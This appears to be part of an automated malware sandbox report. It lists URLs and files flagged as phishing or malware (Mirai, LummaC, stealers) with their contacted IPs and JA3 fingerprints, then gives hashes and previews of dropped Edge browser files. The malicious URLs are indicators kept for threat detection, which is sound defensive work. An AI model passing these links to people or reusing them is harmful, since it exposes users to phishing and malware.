                                                                                                                                          https://u43161309.ct.sendgrid.net/ls/click?upn=u001.L9-2FCbhkaoUACh7As3yZ8i4iABGphfl-2FJgS6Xiu1aw6I-3DgXpA_qO4VbBWAKg4gLfGs-2BfuSyZki3gKzG4I1DrYN15Q8fD7JV1twLeLo1AFs1GBSG3ZgA22dFJdXJloKc56aXDeV3olJKTBJd8NprednZ2LeXdX-2BkcSQE-2F2FRwgBng5RbUCLfjS8-2FI3mrpwyYu9lRatIB62qUwPSax-2Fhh2c7R-2B7pT3Kos0wK0SEJGj4ZMkgOGYhEniKYT7Kn7jN25xFz2sFdtPlVQkIdCFKwDNWmq-2BrAxerZE2GuKgfkuf3l1UY4J42sOOltybAAVyLhV-2BXfmbuQpN4NpshXRIuhta8ho3ChcTA5NtgjludQThyLtwhGns-2ByLqSbpO1Bhhc-2FCgdgP-2BAOxYrGHvKHjVYRr6-2BiryADxfM-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 18.153.4.44
                                                                                                                                          https://dreamsmaybachawuradekasa.org/?dococbwt&qrc=ZHlsYW4uZHVmZnk4QHlhaG9vLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                          • 3.161.82.9
                                                                                                                                          http://click.pstmrk.itGet hashmaliciousUnknownBrowse
                                                                                                                                          • 18.245.46.12
                                                                                                                                          https://www.figma.com/design/Sw6t5vElBVmnrFNiteka8B/Untitled-(Copy)?node-id=0-1&p=f&t=x9aFU3FgLH1rkKBK-0Get hashmaliciousUnknownBrowse
                                                                                                                                          • 13.32.121.19
                                                                                                                                          Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                          • 52.94.140.208
                                                                                                                                          https://z97f4f2525fyg27.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 52.222.232.99
                                                                                                                                          Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                          • 18.157.237.165
                                                                                                                                          ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 34.249.145.219
                                                                                                                                          CLOUDFLARENETUShttps://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052aGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.247.203
                                                                                                                                          https://solve.jrqr.org/awjxs.captcha?u=df8172c9-2ab6-423b-8c92-85669127a20aGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.27.98
                                                                                                                                          Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.24.14
                                                                                                                                          https://u43161309.ct.sendgrid.net/ls/click?upn=u001.L9-2FCbhkaoUACh7As3yZ8i4iABGphfl-2FJgS6Xiu1aw6I-3DgXpA_qO4VbBWAKg4gLfGs-2BfuSyZki3gKzG4I1DrYN15Q8fD7JV1twLeLo1AFs1GBSG3ZgA22dFJdXJloKc56aXDeV3olJKTBJd8NprednZ2LeXdX-2BkcSQE-2F2FRwgBng5RbUCLfjS8-2FI3mrpwyYu9lRatIB62qUwPSax-2Fhh2c7R-2B7pT3Kos0wK0SEJGj4ZMkgOGYhEniKYT7Kn7jN25xFz2sFdtPlVQkIdCFKwDNWmq-2BrAxerZE2GuKgfkuf3l1UY4J42sOOltybAAVyLhV-2BXfmbuQpN4NpshXRIuhta8ho3ChcTA5NtgjludQThyLtwhGns-2ByLqSbpO1Bhhc-2FCgdgP-2BAOxYrGHvKHjVYRr6-2BiryADxfM-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.18.86.42
                                                                                                                                          https://dreamsmaybachawuradekasa.org/?dococbwt&qrc=ZHlsYW4uZHVmZnk4QHlhaG9vLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.18.95.41
                                                                                                                                          Vernales Restaurant-encrypted.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          ZipThis.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.18.2.200
                                                                                                                                          https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGNGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          AKAMAI-ASUSmalware.batGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                          • 184.28.90.27
                                                                                                                                          https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.102.34.86
                                                                                                                                          Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 23.44.181.15
                                                                                                                                          Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 95.101.191.171
                                                                                                                                          Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 104.76.15.30
                                                                                                                                          momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 95.101.248.33
                                                                                                                                          z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 23.51.98.56
                                                                                                                                          armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 23.75.90.11
                                                                                                                                          armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 23.2.226.220
                                                                                                                                          ZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.102.49.254

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          Drivespan.dllGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          title.mp4.htaGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.80.52
                                                                                                                                          un30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.80.52

                                                                                                                                          Dropped Files

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            ATLEQQXO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              ATLEQQXO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                upgrade.htaGet hashmaliciousDarkVision RatBrowse
                                                                                                                                                  MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    UolJwovI8c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      ONHQNHFT.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                        es.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                          BkTwXj17DH.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\08a5e902-89bd-4002-9c83-5d3446accc53.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8373
                                                                                                                                                            Entropy (8bit):5.784946701536982
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:fsNwD9seiRUw0j6lkDs6qRAq1k8SPxVLZ7VTiQ:fsNwM1q62Ds6q3QxVNZTiQ
                                                                                                                                                            MD5:EF1A60C56772EE9DEE27BAE89A2DA8C5
                                                                                                                                                            SHA1:1F6120E7792A8AEA892CDB8410276DE92CCD1A58
                                                                                                                                                            SHA-256:A6B014F024D6A8C15F78567E05E8E3121A35628A2B191B7CC7622F580AEB6DD8
                                                                                                                                                            SHA-512:5D31A7FF99DC76ECE123FD2E493020F8C5957ADB4A2C6875EAAE724CA09D46FAADC0446004F6F5BE66072F3F4457753BB44C42C66C7C6A625E7C6B1298974C6A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\10cd0d4c-e3aa-49dc-a28b-08d2d3dfb2c7.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):23939
                                                                                                                                                            Entropy (8bit):6.047804665767351
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwbsdDMfT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lbsdDMfL5uTY3JY
                                                                                                                                                            MD5:0D0CF6FF78F3077D61441C847C265303
                                                                                                                                                            SHA1:D50E83A8C385F63717FFA3A2B651A702E607C07C
                                                                                                                                                            SHA-256:905791D3B9F2BB310E025E36B81418D23FE52E5AE6B13CE039490569AD7AEBD9
                                                                                                                                                            SHA-512:4C7D040D484B9CFD7880DF2293724041FD7ECCAE2A5E3E1FA0CB73C4B2A5D59E50C761D003EAFC067868EB8B3AF7FFD25EC5EFA27142F19F9A958597F4CDCCCB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1c782878-9226-4b89-ad5b-e33e56f25a3f.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22913
                                                                                                                                                            Entropy (8bit):6.045616245778781
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwr62DmT35ub/Y3jFd4T:EfMkbJrT8IeQc5d1lr62DmL5uTY3J2
                                                                                                                                                            MD5:6D959DF58E03DC4C8BD6252FD318D0CC
                                                                                                                                                            SHA1:831E9E0079C8EB303C3B0A31F65A5F594A4A5BDB
                                                                                                                                                            SHA-256:2F5EED27113FCE288E57BF5DDE5B7940774DC1EBAFB6F13E90D7011E6C7F4427
                                                                                                                                                            SHA-512:A3D6CEE63E7D937F6E942916329209DF968D3E09B5AFE4420B58376E0C8FC75629A5F4978E352ABCA86988CEA9C24B798F0843A72742A80E5430213D45B6FF1A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2a1fd98d-5588-423a-a61f-ef928c4b800f.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):23955
                                                                                                                                                            Entropy (8bit):6.048048787523318
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwbGTDGjfT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lbGTDCfL5uTY3JY
                                                                                                                                                            MD5:4E7C799F78E250EB07FCB465E4F98380
                                                                                                                                                            SHA1:4EE7DEB750C34A0C06AEAC463B6A09957295F424
                                                                                                                                                            SHA-256:12391B31B8BC70C3C56369F05F6940AEC768041432F60C4E26201C7839F15EE8
                                                                                                                                                            SHA-512:AE1E9AC6E581FA909383CB01DA867A62620052A7AE32BE1661326C79A5D5871D782BE5783C12D25C5C7721BB09A55F1C7D685BB7916634611904A834162EEA8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8fc2a059-e901-4b92-b291-83d60378a418.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9ff4700b-d9e3-4b8a-8a83-1daeea7730e6.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):23939
                                                                                                                                                            Entropy (8bit):6.047804665767351
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwbsdDMfT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lbsdDMfL5uTY3JY
                                                                                                                                                            MD5:0D0CF6FF78F3077D61441C847C265303
                                                                                                                                                            SHA1:D50E83A8C385F63717FFA3A2B651A702E607C07C
                                                                                                                                                            SHA-256:905791D3B9F2BB310E025E36B81418D23FE52E5AE6B13CE039490569AD7AEBD9
                                                                                                                                                            SHA-512:4C7D040D484B9CFD7880DF2293724041FD7ECCAE2A5E3E1FA0CB73C4B2A5D59E50C761D003EAFC067868EB8B3AF7FFD25EC5EFA27142F19F9A958597F4CDCCCB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\7aa0fa75-4426-4132-991a-0669cc76a98a.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):107893
                                                                                                                                                            Entropy (8bit):4.640159935562401
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                            MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                            SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                            SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                            SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):107893
                                                                                                                                                            Entropy (8bit):4.640159935562401
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                            MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                            SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                            SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                            SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677C5388-4C0.pma

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                            Entropy (8bit):0.03992437171506724
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:4B01utmqvDzKX7HJ8iD12absbZHtgbXIghxULHhJfNEl/cRQMczKDtCn8y08TcmQ:e0EtelWCuhlgQmKDA08T2RGOD
                                                                                                                                                            MD5:7744619E95461B03723BC2AD297D8490
                                                                                                                                                            SHA1:EE5FDDF07D7C85A720BFF93006A0E2785E3FADB8
                                                                                                                                                            SHA-256:6CDA53B8B4D4294141A07A3A47939AB80A934C4600589109A3038C9EA98D803D
                                                                                                                                                            SHA-512:13D6BDF267AE41E1FDA597181ED32F549EF7E81C12E8511E4F1494D0F3EB4838CFC93F3808380234896D69035D4DA1149AFC58EDA0DB4624D4F461EE61191A08
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...@..@...@.....C.].....@...............xa..0Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....u.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".eqswos20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U..G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677C5389-930.pma

                                                                                                                                                            Download File
